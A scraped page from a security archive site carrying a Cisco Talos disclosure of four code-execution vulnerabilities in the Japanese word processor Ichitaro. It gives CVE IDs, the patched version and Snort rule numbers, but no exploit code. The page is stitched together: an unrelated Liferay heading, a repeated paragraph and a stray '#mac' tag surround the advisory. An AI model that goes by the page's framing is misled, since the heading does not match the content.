*   File Inclusion (4,186)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,691)
*   Intrusion Detection (876)
*   Java (2,961)
*   JavaScript (831)
*   Kernel (6,471)
*   Local (14,314)
*   Magazine (586)
*   Overflow (12,549)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,505)
*   Python (1,488)
*   Remote (30,329)
*   Root (3,538)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,825)
*   Shell (3,138)
*   Shellcode (1,209)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,180)
*   TCP (2,385)
*   Trojan (687)
*   UDP (881)
*   Virus (663)
*   Vulnerability (31,400)
*   Web (9,473)
*   Whitepaper (3,740)
*   x86 (948)
*   XSS (17,599)
*   Other

**File Archives**

*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (372)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,715)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,194)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,962)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,470)
*   UNIX (9,209)
*   UnixWare (185)
*   Windows (6,534)
*   Other

Liferay Portal 6.2.5 Insecure Permissions

Ichitaro uses the ATOK input method (IME) and uses the proprietary .jtd file extension. It’s the second most-popular word processing system in Japan behind only Microsoft word.

Wednesday, April 5, 2023 11:04

_A Cisco Talos researcher discovered these vulnerabilities._

Cisco Talos recently discovered four vulnerabilities in Ichitaro, a popular word processing software in Japan produced by JustSystems that could lead to arbitrary code execution.

Ichitaro uses the ATOK input method (IME) and uses the proprietary .jtd file extension. It’s the second most-popular word processing system in Japan behind only Microsoft word.

Talos discovered four vulnerabilities that could allow an attacker to gain the ability to execute arbitrary code on the targeted machine. TALOS-2022-1673 (CVE-2022-43664) can trigger the reuse of freed memory by the attacker, which can lead to further memory corruption and potentially result in arbitrary code execution after the target opens an attacker-created malicious file. TALOS-2023-1722 (CVE-2023-22660) has a similar effect, though in this case, it’s caused by a buffer overflow condition.

There are two other memory corruption vulnerabilities that can also be triggered if the target opens a specially crafted, malicious document — TALOS-2022-1687 (CVE-2023-22291) and TALOS-2022-1684 (CVE-2022-45115) — which could also lead to code execution.

Cisco Talos worked with JustSystems to ensure these vulnerabilities are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: Ichitaro 2022, version 1.0.1.57600. Talos tested and confirmed this version of the word processor could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against this vulnerability:  
61011, 61012, 61091, 61092, 61163, 61164, 61393 and 61394. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Tag

#mac